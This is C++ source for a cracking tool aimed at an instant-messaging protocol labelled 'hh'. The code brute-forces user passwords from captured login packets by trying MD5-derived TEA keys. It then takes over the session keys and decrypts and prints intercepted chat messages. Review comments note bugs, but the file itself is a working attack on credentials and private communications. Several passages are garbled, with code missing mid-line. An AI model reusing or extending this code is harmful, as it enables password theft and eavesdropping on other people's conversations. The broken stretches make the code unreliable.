

#include "stdafx.h" 
#include "myCrack.h" 
#include "myState.h" 
 
#include "md5.h"
#include "mycrypt.h" 
#include  
#include  
 
 
 
/* File-local character table for the brute-force search.  initial_table()
 * clears it (and, judging by the chfield1..chfield8 strings it builds,
 * fills it afterwards); it is all zero until then. */
static char chfield[128] = { 0 };

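/* Number of bytes shown on one hex-dump row. */
static const size_t kDumpRowBytes = 16;

/*
 * Print a single hex-dump row to `pipe`.
 *
 * row     first byte of the row (rowLen bytes are read from it)
 * rowLen  1..kDumpRowBytes bytes; a shorter final row is padded so the
 *         character column stays aligned (3 blanks per missing byte)
 * offset  byte offset of `row` inside the dumped buffer, printed as %08X
 *
 * Layout per row: "<offset> " then one " XX" per byte, except that the 9th
 * byte is introduced by '-' instead of a blank; then four blanks; then the
 * bytes as characters.  Only 7-bit printable ASCII (0x20..0x7E) is echoed
 * verbatim -- DEL (0x7F) and every 8-bit value are shown as '.'.  The bytes
 * being dumped come from captured traffic, so raw control bytes (including
 * C1 controls in 0x80..0x9F) must never be written to the output stream.
 */
static void outputDumpRow( const u_char* row, size_t rowLen, size_t offset, FILE* pipe )
{
    fprintf( pipe, "%08X ", ( unsigned int )offset );
    for ( size_t j = 0; j < rowLen; j++ )
    {
        fputc( ( j == 8 ) ? '-' : ' ', pipe );
        fprintf( pipe, "%02X", row[j] );
    }
    /* A short row gets 3 blanks per missing byte so the text column lines up. */
    for ( size_t j = rowLen; j < kDumpRowBytes; j++ )
    {
        fprintf( pipe, "   " );
    }
    fprintf( pipe, "    " );
    for ( size_t j = 0; j < rowLen; j++ )
    {
        const u_char b = row[j];
        fputc( ( b >= 0x20 && b <= 0x7E ) ? ( int )b : '.', pipe );
    }
    fprintf( pipe, "\n" );
}

/*
 * Write a classic hex dump of byteArray[0..byteArrayLen) to `pipe`.
 *
 * byteArray     data to dump; may be NULL only when byteArrayLen is 0
 * byteArrayLen  number of bytes; 0 prints just the header line
 * pipe          destination stream; NULL prints nothing
 *
 * Output: a header "binary data [ N bytes ] ----> " followed by one row per
 * kDumpRowBytes bytes (see outputDumpRow for the row format).
 *
 * Fix over the previous version: the printable test used to be
 * `b >= ' ' && b <= 255`, and the second half is always true for a u_char,
 * so 0x7F and 0x80..0xFF were written raw into the dump.  The test is now
 * restricted to 7-bit printable ASCII.
 */
void outputBinary ( const u_char * byteArray, const size_t byteArrayLen, FILE* pipe ) 
{ 
    if ( pipe == NULL ) 
    { 
        return; 
    } 
    fprintf( pipe, "binary data [ %lu bytes ] ----> \n", ( long unsigned int )byteArrayLen ); 
    if ( byteArray == NULL || byteArrayLen == 0 ) 
    { 
        return; 
    } 
    /* `done` doubles as the row offset printed in the left column. */ 
    for ( size_t done = 0; done < byteArrayLen; done += kDumpRowBytes ) 
    { 
        const size_t remaining = byteArrayLen - done; 
        const size_t rowLen    = ( remaining < kDumpRowBytes ) ? remaining : kDumpRowBytes; 
        outputDumpRow( byteArray + done, rowLen, done, pipe ); 
    } 
}  /* end of outputBinary */ 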
 
int outputtext( const u_char* hh_plain_text, const size_t hh_len_plain, int direct, FILE* pipe ) 
{ 
	int k, time; 
 
	if(direct == C2S) 
		k = 52; 
	else if(direct == S2C) 
		k = 64; 
	else 
		return 0; 
 
	if(hh_len_plain == 1 && hh_plain_text[0]==0 ) 
	{ 
/*		if(direct == C2S) 
			fprintf(pipe, "message sended!\n\n"); 
		else if(direct == S2C) 
			fprintf(pipe, "message received!\n\n"); 
		else 
*/			return 0; 
	} 
	if(hh_len_plain < 60)  
		return 0; 
	if(hh_plain_text[k]!=1) 
	{ 
//		outputBinary(hh_plain_text, hh_len_plain, pipe); 
		return 0; 
	} 
	fprintf(pipe, "Sender HH: %d\t\tReceiver HH: %d\n", 
		htonl(*((unsigned int*)&hh_plain_text[0])), 
		htonl(*((unsigned int*)&hh_plain_text[4])) ); 
//	fprintf(pipe, "Sender HH version: %d.%d\n", hh_plain_text[8], hh_plain_text[9]); 
//	fprintf(pipe,"direct connection key is: \n"); 
//	for(k=18; k<34; k++) 
//		fprintf(pipe, "%02x ",hh_plain_text[k]); 
//	time = htonl(*((unsigned int*)&hh_plain_text[34])); 
//	fprintf(pipe, "\nUnknown data: %d", time); 
//	if(direct == C2S) 
	time = htonl(*((unsigned int*)&hh_plain_text[k-14])); 
/*	else if(direct == S2C) 
	{ 
//		outputBinary(hh_plain_text, hh_len_plain, pipe); 
		time = htonl(*((unsigned int*)&hh_plain_text[50])); 
	} 
//	time = htonl(*((unsigned int*)&hh_plain_text[direct==C2S?38:46])); 
*/ 
	fprintf(pipe, "Time: %s", ctime((time_t*)&time)); 
	fprintf(pipe, "content of the message:\n"); 
	 
	for(k++;hh_plain_text[k];k++) 
	{ 
		if(hh_plain_text[k]==0x14) 
			fprintf(pipe,"[%d]",hh_plain_text[++k]); 
		else 
			fprintf(pipe,"%c", hh_plain_text[k]); 
	} 
	fprintf(pipe, "\nFontsize: %d ",hh_plain_text[++k]&0x1f); 
	if(hh_plain_text[k]&0x20) fprintf(pipe,"B"); 
	if(hh_plain_text[k]&0x40) fprintf(pipe,"I"); 
	if(hh_plain_text[k]&0x80) fprintf(pipe,"U"); 
	fprintf(pipe, "\tColor: RGB(%d,%d,%d)", 
		hh_plain_text[k+1],hh_plain_text[k+2],hh_plain_text[k+3]); 
	k+=4; 
	fprintf(pipe, "\tCharset:%d", hh_plain_text[++k]); 
	fprintf(pipe, "\tFont: "); 
	for(k++;ksender_ver = swapu16(h->sender_ver);
    h->hh_cmd     = swapu16(h->hh_cmd);
    h->sq_no      = swapu16(h->sq_no);
    return h;
}

/*
 * Start from a fully zeroed object: the two derived keys, the plaintext
 * buffer and its length, the candidate-password state (pass_i, password,
 * pwwidth) and the mode byte.  crkmod defaults to 2.
 *
 * NOTE(review): ip_addr / ip_proto are not initialised here; they are only
 * set by setaddr() -- confirm nothing reads them before that call.
 */
CMyCrack::CMyCrack()
{
	crkmod       = 2;
	pwwidth      = 0;
	hh_len_plain = 0;

	memset(inikey1,       0, sizeof(inikey1));
	memset(inikey2,       0, sizeof(inikey2));
	memset(hh_plain_text, 0, sizeof(hh_plain_text));
	memset(pass_i,        0, sizeof(pass_i));
	memset(password,      0, sizeof(password));
}
/* No explicit cleanup.  The members zeroed in the constructor look like
 * inline buffers (memset over sizeof), and the hh_state created in
 * crack_hh_login() is handed to g_objState rather than kept here --
 * confirm no member is a heap pointer before relying on this. */
CMyCrack::~CMyCrack() 
{ 
} 
/* Store the requested crack mode in crkmod.  No validation is applied;
 * callers pass whatever value they want kept. */
void CMyCrack::setcrkmode(char mode)
{
	this->crkmod = mode;
}
 
/* Record the connection (address 4-tuple and IP protocol) that later
 * crack_hh_login() calls look up and store in g_objState. */
void CMyCrack::setaddr(struct tuple4 addr, u_char proto)
{
	this->ip_proto = proto;
	this->ip_addr  = addr;
}
int CMyCrack::initial_table(int charfield)
{
	unsigned int i,j,ret;
	char chfield1 [] = "abcdefghijklmnopqrstuvwxyz";
	char chfield2 [] = "0123456789";
	char chfield4 [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
	char chfield8 [] = "~_!@#$%^&*<>:+|";

	for(i=0 ; i<128; i++)
		chfield[i]=0;
	for(i=0 ; iMAX_P_LEN? MAX_P_LEN: buflen;
    memcpy(buf_copy, buffer, datalen);
    pquh = (hh_udp_header*)(buf_copy);

    if(pquh->begin_tag != HH_BEGIN_TAG || pquh->data[datalen] != HH_END_TAG)
    {
        fprintf( stderr, "what read is not valid login buffer\n" );
    	return 0;
    }

	//fprintf( stderr, "Found a valid hh packet, now analysing...\n"); 
	//fprintf( stderr, "packet sender version is 0x%04x and cmdcode is 0x%04x\n",
	//                   pquh->sender_ver, pquh->hh_cmd );
    
    //return hh_analysis(pquh, datalen, pipe );


	return 1;
   
    
}

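/*
 * Read one captured packet from a file and hand it to parse_buffer().
 *
 * buffile  path of the file to read; NULL is rejected
 * Returns 1 when the file was opened and read, 0 when the path is NULL or
 * the file cannot be opened or read.  parse_buffer()'s own verdict is not
 * propagated (it never was); it only reports on stdout.
 *
 * At most kBufCrackMaxBytes bytes are read; a longer file is silently
 * truncated to that prefix.
 *
 * Fix over the previous version: an unopenable file used to be reported
 * as success (1), so a caller could not tell "nothing parsed" from "parsed".
 */
int CMyCrack::buf_crack( char* buffile)
{
    const size_t kBufCrackMaxBytes = 200;
    unsigned char buf[kBufCrackMaxBytes];

    if (buffile == NULL)
    {
        return 0;
    }
    FILE* fp = fopen(buffile, "rb");
    if (fp == NULL)
    {
        fprintf(stderr, "buf_crack: cannot open %s\n", buffile);
        return 0;
    }
    const size_t buflen     = fread(buf, 1, kBufCrackMaxBytes, fp);
    const int    readFailed = ferror(fp);   /* check before fclose() discards the flag */
    fclose(fp);
    if (readFailed)
    {
        fprintf(stderr, "buf_crack: read error on %s\n", buffile);
        return 0;
    }
    parse_buffer(buf, (unsigned int)buflen, stdout);
    return 1;
}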
/* Placeholder check on a freshly decrypted server reply.  It accepts
 * everything, so in crack_hh_login() any decrypt_msg() call that does not
 * fail is treated as having used the right key. */
u_int CMyCrack::validpass()
{
	const u_int accepted = 1;
	return accepted;
}

/*
 * Password search over one decrypted login blob.
 *
 * crkmode  0 selects the dictionary path; any other value is passed to
 *          initial_table() to set up the character table for the
 *          brute-force search.
 * data     buffer handed to simple_decrypt() on every attempt.
 *
 * For each candidate in `password` two keys are tried: the output of
 * MD5String(password) and MD5_16 applied to that digest.  On a hit the
 * candidate is printed to stdout, inikey1/inikey2 are filled from the two
 * digests and 1 is returned; 0 means no hit, or that the search could not
 * start.
 *
 * NOTE(review): the dictionary path is dead code as written -- `dictionary`
 * is initialised to NULL and never assigned, so crkmode == 0 returns 0 at
 * once and the "changing crack mode to 2" message is never reached (and
 * would be misleading anyway: the function returns rather than switching).
 * NOTE(review): `dic` is not closed on the two `return 1` paths inside the
 * loop; only the exhausted-list path fcloses it.
 * NOTE(review): the digest is passed to simple_decrypt() as unsigned long*;
 * that is 4-byte words on ILP32/Win32 but 8-byte on LP64 -- confirm which
 * width the TEA routines expect before building elsewhere.
 * NOTE(review): digest[] is MAX_PASS_LEN bytes but receives whatever
 * MD5String()/MD5_16() write -- confirm MAX_PASS_LEN covers that.
 */
int CMyCrack::hh_crack(char crkmode,  unsigned char* data )
{
	int i, working;
	unsigned char digest[MAX_PASS_LEN]; 
 
	i = 0;
	working = 1; 
	FILE* dic = NULL;
	if (crkmode == 0) 
	{ 
		/* dictionary mode: candidates are pulled via update_pass_dic(dic) */ 
		char* dictionary = NULL; 
		if(dictionary)
		{
			fprintf(stderr,"dictionary attack mode...\n");
			dic = fopen(dictionary,"r");
			if(!dic)
			{
				fprintf(stderr,"Can't open dictionary file %s, changing crack mode to 2\n", dictionary);
				return 0;
			}
			working = update_pass_dic(dic);
		}
		else
		{
			/* always taken as written: no dictionary path is ever configured */
			return 0;
		}
	}
	else
		/* brute-force mode: initial_table() prepares the table; its result is kept in pwwidth */
		pwwidth = initial_table(crkmode);

	/* only reachable for crkmode != 0, since mode 0 returned above */
	fprintf(stderr,"brute-force attack mode ----- %d \n", crkmode);

	while(working)
	{
		/* key 1: digest of the current candidate */
		MD5String(password, (char*)digest);
		if(simple_decrypt( data ,(unsigned long*)digest) )
		{
			fprintf(stdout,"cracked!\n" );
			fprintf(stdout,"pass=%s\n", password);
			fflush(stdout); 
			
			memcpy(inikey1, digest, LEN_TEA_KEY); 
			MD5_16((char*)inikey1, (char*)inikey2); 
            return 1;   /* NOTE(review): dic (if open) is leaked here */
		}
		/* key 2: MD5_16 of the first digest, computed in place */
		MD5_16((char*)digest,(char*)digest);
		if(simple_decrypt( data ,(unsigned long*)digest) )
		{
			fprintf(stdout,"cracked!\n" );
			fprintf(stdout,"pass=%s\n", password);
			fflush(stdout);
			
			/* inikey1 is recomputed rather than saved from the first attempt */
			MD5String(password, (char*)inikey1); 
			memcpy(inikey2, digest, LEN_TEA_KEY); 
			return 1;   /* NOTE(review): dic (if open) is leaked here too */
		}
		i++;
		if(i>RECORD_GAP)
		{
			//record it: progress line every RECORD_GAP candidates
			fprintf(stdout, "pass %s trying...\n", password);
			i=0;
		}
		/* advance to the next candidate; a zero result ends the loop */
		if(crkmode == 0)
		{
			if (dic)
				working = update_pass_dic(dic);
		}
		else
			working = update_pass();

	}
	/* candidates exhausted: both exits report failure */
	if((crkmode == 0) && dic)
	{
		fclose(dic);
		fprintf(stderr,"dictionary attack completed!\n");
		return 0;
	}
	return 0;

} 
 
/*
 * Handle one login-phase packet for the connection recorded by setaddr().
 *
 * data/len  packet payload.  len must be a multiple of 4; a length of the
 *           form 8*N+4 is treated as client->server (carries hh_no and a
 *           key, see hh_login_data), any other multiple of 8 as
 *           server->client.
 * reserved  unused.
 *
 * Returns 1 when a C2S login was decrypted and hh_crack() found the
 * password (a new hh_state is then registered in g_objState); 2 when an
 * S2C reply decrypted under the stored key1 or key2 (key1 is then replaced
 * by plaintext bytes 1..LEN_TEA_KEY and the state advanced to 2); 0 in
 * every other case.
 *
 * NOTE(review): len == 4 passes both length checks, and
 * `len - sizeof(u_int) - LEN_TEA_KEY` is unsigned, so datalen wraps for
 * such a packet before decrypt_msg() is called -- a minimum-length check
 * ahead of the subtraction would close this.
 * NOTE(review): the S2C branch reads hh_plain_text up to offset
 * LEN_TEA_KEY + 1 + sizeof(u_int) without checking hh_len_plain first.
 * NOTE(review): the hh_state is created with `new` and passed to
 * g_objState.AddState(); ownership is assumed to transfer there -- confirm.
 * NOTE(review): the password copy uses MAX_PASS_LEN, so both `password` and
 * hh_state::hh_password must be at least that large -- confirm in the headers.
 */
u_int CMyCrack::crack_hh_login( const u_char * data, const u_int len, void* reserved)
{
    hh_login_data * pqld;
    u_int           datalen;

    if(len%4)
        return 0;
    if(len%8)   //C2S, has hh_number, len = 8*N+4 
    {
        pqld = (hh_login_data *)data;
        /* encrypted part = payload minus the hh number and the trailing key */
        datalen = len - sizeof(u_int) - LEN_TEA_KEY;
        if(decrypt_msg( pqld->data, datalen, (unsigned long *)pqld->key, hh_plain_text, (unsigned long *)&hh_len_plain) )
        {
			// fprintf( stderr, "decrypted OK\n");
			/* try the four crack modes in turn; each returns 1 on a hit */
			if (hh_crack(HH_NUM_CRACK, hh_plain_text ) != 1)
			{
				if (hh_crack(HH_DIC_CRACK, hh_plain_text ) != 1)
				{
					if (hh_crack(HH_LOWER_CRACK, hh_plain_text ) != 1)
					{
						if (hh_crack(HH_UPPER_CRACK, hh_plain_text ) != 1)
						{
							return 0;
						}
					}
				}
			}

			/* replace any stale state for this connection with a fresh one */
			g_objState.FreeState(ip_addr, ip_proto);
			hh_state * hhstate = new hh_state;
			hhstate->addr = ip_addr;
			hhstate->proto = ip_proto;
			hhstate->hh_number = swapu32(pqld->hh_no);   /* byte order fixed by swapu32() */
			memcpy(hhstate->hh_password, password, MAX_PASS_LEN);
			hhstate->state = 1; 
			/* keys derived by hh_crack() from the recovered password */
			memcpy(hhstate->key1, inikey1, LEN_TEA_KEY); 
			memcpy(hhstate->key2, inikey2, LEN_TEA_KEY); 
			g_objState.AddState(hhstate); 

			//fprintf( stderr, "hh %d are trying to log in!\n\n", (u_int)hh_number);
            return 1;
        }
        else
        {
			//fprintf( stderr, "decrypted failed!\n");
            return 0;
        }
    }    

    else        //S2C
    {
		/* the reply is only useful if a C2S login was already processed */
		hh_state * hhstate = g_objState.FindState(ip_addr, ip_proto);
		if (!hhstate)
			return 0;
        //if ( decrypt_msg((unsigned char*) data, len, (unsigned long *)inikey1, hh_plain_text, (unsigned long *)&hh_len_plain) )
		if ( decrypt_msg((unsigned char*) data, len, (unsigned long *)hhstate->key1, hh_plain_text, (unsigned long *)&hh_len_plain) )
        {
			//fprintf(stderr, "decrypted OK 1\n");
            if(validpass())
            {
		
				/* the next key sits at plaintext offset 1 */
				memcpy(hhstate->key1, hh_plain_text + 1, LEN_TEA_KEY);
				hhstate->state = 2; 

				outputBinary( hhstate->key1, LEN_TEA_KEY, stderr);
                //outputBinary( workkey, LEN_TEA_KEY, stderr); 
				return 2;
            }
            /* validpass() false: falls through to the final return 0 */
        }
        else if ( decrypt_msg((unsigned char*)data, len, (unsigned long *)hhstate->key2, hh_plain_text, (unsigned long *)&hh_len_plain) )
        {
			//fprintf(stderr, "decrypted OK 2\n");
            if(validpass())
            {
				fprintf(stderr, "We got a workkey for hh %d !\n", hhstate->hh_number);
				

				memcpy(hhstate->key1, hh_plain_text + 1, LEN_TEA_KEY);
				hhstate->state = 2; 
				/* NOTE(review): computed but never used, and read without a length check */
				u_int number = *(u_int *)(hh_plain_text+ LEN_TEA_KEY + 1);
				int hh_number = swapu32(number);


				outputBinary( hhstate->key1, LEN_TEA_KEY, stderr); 
				return 2;
            }
        }
        else 
        {
            fprintf(stderr, "decrypted failed! maybe wrong key provided!\n");
            hh_len_plain = 0; 
			return 0;
        }
        return 0;
    }

}